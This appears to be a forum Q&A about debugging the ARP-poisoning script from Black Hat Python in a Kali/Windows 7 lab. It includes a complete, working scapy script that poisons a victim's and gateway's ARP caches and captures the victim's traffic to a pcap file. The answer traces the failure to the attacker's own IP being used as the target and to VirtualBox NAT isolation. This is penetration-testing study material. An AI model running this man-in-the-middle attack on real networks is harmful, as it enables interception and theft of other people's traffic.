
ARP Poisoning with scapy: Failure to get target MAC


In the fourth chapter of Justin Seitz's Black Hat Python, in the section on ARP poisoning with scapy, I'm having trouble obtaining the MAC address for the target machine's IP. I'm using a Kali VM as the attacking machine and a Windows 7 VM as the target machine.

# Keep the star import first so the explicit stdlib imports below win any
# name clashes with whatever scapy.all re-exports.
from scapy.all import *

import os
import signal
import sys
import threading
import time

# Interface the ARP frames are sent on and sniffed from (also assigned to conf.iface below).
interface = "eth0"
# NOTE(review): 10.0.2.15 is the attacking machine's *own* address (see the
# `inet` line of the ifconfig output further down).  The victim must be a
# different host on the same layer-2 segment -- a host never receives the ARP
# request it itself put on the wire, so get_mac() for this value always
# returns None, which is exactly the "Failed to get target MAC" seen below.
target_ip = "10.0.2.15"
# Default gateway the victim talks through; both sides of this victim<->gateway
# pair get poisoned so their traffic flows through the attacker.
gateway_ip = "10.0.2.2"
# Number of victim packets sniff() captures before the attack is torn down.
packet_count = 1000


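def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Undo the poisoning by re-announcing the real gateway/victim bindings.

    Sends unsolicited ARP replies (op=2) with the broadcast hardware
    destination so every host on the segment -- victim and gateway included --
    relearns the correct IP->MAC mappings.  ``count=5`` repeats each reply to
    survive packet loss.

    Args:
        gateway_ip, gateway_mac: real address pair of the default gateway.
        target_ip, target_mac:   real address pair of the victim.

    Side effect: when invoked from a worker thread it sends SIGINT to the
    process so the main thread's sniff() is interrupted.  When invoked from
    the main thread (the normal case) no signal is sent: the original
    unconditionally killed itself here, which raised a second
    KeyboardInterrupt inside the caller's except/cleanup path and crashed the
    program while the poison thread kept running.
    """
    print("[*] Restoring target...")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    # The original referenced a non-existent ``Arp`` class here (NameError),
    # so the gateway's cache was never restored.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)

    if threading.current_thread().name != "MainThread":
        os.kill(os.getpid(), signal.SIGINT)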


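def get_mac(ip_address):
    """Resolve ``ip_address`` to a MAC with a broadcast ARP who-has on conf.iface.

    Args:
        ip_address: dotted-quad IPv4 address of a host on the local segment.

    Returns:
        The Ethernet source MAC of the first ARP reply, or ``None`` if nothing
        answered within ``timeout`` seconds across ``retry`` attempts.  A
        ``None`` for a host that is up usually means it is not in this
        broadcast domain (different subnet, NAT-isolated VM) or that it *is*
        this machine -- the request goes out on the wire and is not looped
        back, so a host cannot ARP for its own address this way.
    """
    answered, _unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2, retry=10)

    # srp() returns (sent, received) pairs; the reply frame's Ethernet source
    # is the hardware address we are after.  The original had ``return None``
    # mis-indented inside the loop as dead code.
    if not answered:
        return None
    _sent, reply = answered[0]
    return reply[Ether].src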


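def poison_target(gateway_ip, gateway_mac, target_ip, target_mac, stop_event=None):
    """Keep telling the victim we are the gateway and the gateway we are the victim.

    Every 2 s two unsolicited ARP replies (op=2) go out: one to the victim
    claiming ``gateway_ip`` and one to the gateway claiming ``target_ip``.
    ``hwsrc`` is left unset, so scapy fills in this interface's own MAC, which
    is what makes both sides forward through the attacker.

    Args:
        gateway_ip, gateway_mac: default gateway's address pair.
        target_ip, target_mac:   victim's address pair.
        stop_event: optional ``threading.Event``.  When it is set the loop
            exits cleanly; without it the loop runs until KeyboardInterrupt,
            as in the original.

    Note: Python delivers KeyboardInterrupt only to the main thread, so when
    this runs as a thread target the ``except`` branch below never fires --
    the caller must use ``stop_event`` to end the loop.
    """
    # Renamed: the original's local ``poison_target`` shadowed this function,
    # and one line misspelled it ``posion_target`` (NameError on first use).
    poison_victim = ARP()
    poison_victim.op = 2
    poison_victim.psrc = gateway_ip
    poison_victim.pdst = target_ip
    poison_victim.hwdst = target_mac

    poison_gateway = ARP()
    poison_gateway.op = 2
    poison_gateway.psrc = target_ip
    poison_gateway.pdst = gateway_ip
    poison_gateway.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while stop_event is None or not stop_event.is_set():
        try:
            send(poison_victim)
            send(poison_gateway)

            # Re-poison well inside a typical ARP cache timeout; waiting on
            # the event (when given) makes shutdown immediate.
            if stop_event is None:
                time.sleep(2)
            else:
                stop_event.wait(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            # The original fell through and kept looping, re-poisoning the
            # caches it had just restored.
            break

    print("[*] ARP poison attack finished.")
    return


# --- script entry point -----------------------------------------------------
# Only run this against hosts and networks you are explicitly authorized to
# test: ARP poisoning silently redirects and can disrupt real traffic.

conf.iface = interface
conf.verb = 0

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(1)
else:
    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

# A host never answers an ARP request it put on the wire for its own address,
# so a target_ip equal to this interface's address can only ever fail below.
# Fail fast with a message that says so instead of a 20 s silent timeout.
if target_ip == get_if_addr(interface):
    print("[!!!] target_ip %s is this machine's own address; set it to the victim's IP. Exiting." % target_ip)
    sys.exit(1)

target_mac = get_mac(target_ip)

if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(1)
else:
    print("[*] Target %s is at %s" % (target_ip, target_mac))

# The original passed the misspelled name ``posion_target`` as the thread
# target (NameError).  The Event lets us stop the loop deterministically;
# daemon=True means sys.exit() / an unhandled error cannot hang forever
# waiting on a poison loop that would otherwise keep re-poisoning.
stop_poisoning = threading.Event()
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac, stop_poisoning))
poison_thread.daemon = True
poison_thread.start()

try:
    print("[*] Starting sniffer for %d packets" % packet_count)

    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    wrpcap('arper.pcap', packets)
except KeyboardInterrupt:
    # CTRL-C during the capture: fall through to the cleanup below and exit
    # normally (status 0), as the original did.
    pass
finally:
    # Stop the poison loop *before* restoring; otherwise its next round
    # immediately undoes the repair we are about to send.
    stop_poisoning.set()
    poison_thread.join()
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)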

The attacking machine:

root@kali:~/Documents# ifconfig
    eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
    inet 10.0.2.15  netmask 255.255.255.0  broadcast 10.0.2.255
    inet6 fe80::a00:27ff:fe81:b1df  prefixlen 64  scopeid 0x20<link>
    ether 08:00:27:81:b1:df  txqueuelen 1000  (Ethernet)
    RX packets 101529  bytes 101906744 (97.1 MiB)
    RX errors 0  dropped 0  overruns 0  frame 0
    TX packets 34775  bytes 3530239 (3.3 MiB)
    TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
    inet 127.0.0.1  netmask 255.0.0.0
    inet6 ::1  prefixlen 128  scopeid 0x10<host>
    loop  txqueuelen 1000  (Local Loopback)
    RX packets 218  bytes 13972 (13.6 KiB)
    RX errors 0  dropped 0  overruns 0  frame 0
    TX packets 218  bytes 13972 (13.6 KiB)
    TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

The output:

root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.

Solution

  • You use the IP of Kali (the attacking machine) as target_ip (10.0.2.15 — compare the `inet` line of the ifconfig output above). A host never receives the ARP request it has just put on the wire for its own address, so get_mac(target_ip) has nobody to answer it and returns None, which is exactly the "Failed to get target MAC" you see. The Windows VM runs on the same physical computer, but as a separate virtual machine it has its own IP address (https://www.quora.com/Do-virtual-machines-have-their-own-IP) — that address is what target_ip must be set to.

    It is not even certain that the Windows VM is on the same network at all. The 10.0.2.15 / 10.0.2.2 pair looks like VirtualBox's default NAT mode, where each VM sits alone on its own private 10.0.2.0/24 behind the hypervisor and never sees the other VMs' layer-2 traffic — and ARP poisoning only works when attacker and victim share a broadcast domain. Put both VMs on the same internal or host-only network and give them static IPs in one /24 (i.e. 10.0.2.x/24 — replace the x); see https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address

    The commenter (coder) is right: first confirm basic connectivity by pinging the Windows VM from Kali, then check that `arp -n` on Kali shows the target's MAC — only once that works can the script's own ARP requests succeed.